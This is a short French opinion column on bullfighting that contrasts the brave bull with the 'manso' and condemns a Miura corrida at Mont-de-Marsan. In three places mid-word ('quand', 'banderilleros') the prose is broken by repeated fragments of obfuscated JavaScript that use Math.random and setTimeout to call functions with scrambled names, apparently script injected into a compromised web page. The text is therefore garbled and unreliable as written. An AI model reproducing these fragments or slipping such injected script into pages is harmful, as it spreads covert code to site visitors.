LA CHARGE ET LES COUPS DE TETE

Le taureau brave charge franchement ; le manso donne des coups de tête vers le haut ou de côté. Le taureau brave attaque ; le manso, de race brave, se défend.

De ce fait, quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and il sent qu’il ne peut pas encorner le leurre qui le défie, il se repent et préfère la cuisse ou la hanche du torero, substituant la charge par un coup de corne qui est comme un traître coup de rasoir.

Le taureau manso, de race brave, est capable d’aller de loin à l’encontre du cheval. Mais dès qu’il sent la pique, il confirme sa nature. C’est pourquoi, le replacer de loin à la seconde pique après qu’il ait fui à la première est une erreur tauromachique, malgré les applaudissements des toristes indocumentés.

Ces deux affirmations servent à disqualifier la corrida de Miura qui fut lidiée dimanche dernier à Mont-de-Marsan. Une corrida qui ne chargea jamais, qui donnait toujours des coups de cornes vers le haut et qui fut mansa, sans palliatifs, devant le cheval.  Une corrida pour feinter, pas pour toréer. Et c’est ce que firent les toreros.  Avec engagement, avec mérite, mais sans toréer. Je ne le leur reproche pas. Même Lagartijo ressuscité n’aurait pu leur effectuer une passe selon les canons de la tauromachie.

Disons les choses clairement : le taureau brave est courageux, le manso est lâche. C’est pourquoi il « derrote », il donne des coups de cornes vers le haut, fait vibrer les étriers du picador, fuit dès qu’il ressent le châtiment, ferme la sortie aux bandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}anderilleros et freine son attaque quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and il se sent dominé par la muleta. On ne peut pas manipuler les valeurs de la Fiesta. Et la bravoure est entre toutes l’axe essentiel.

Les commentaires sont fermés.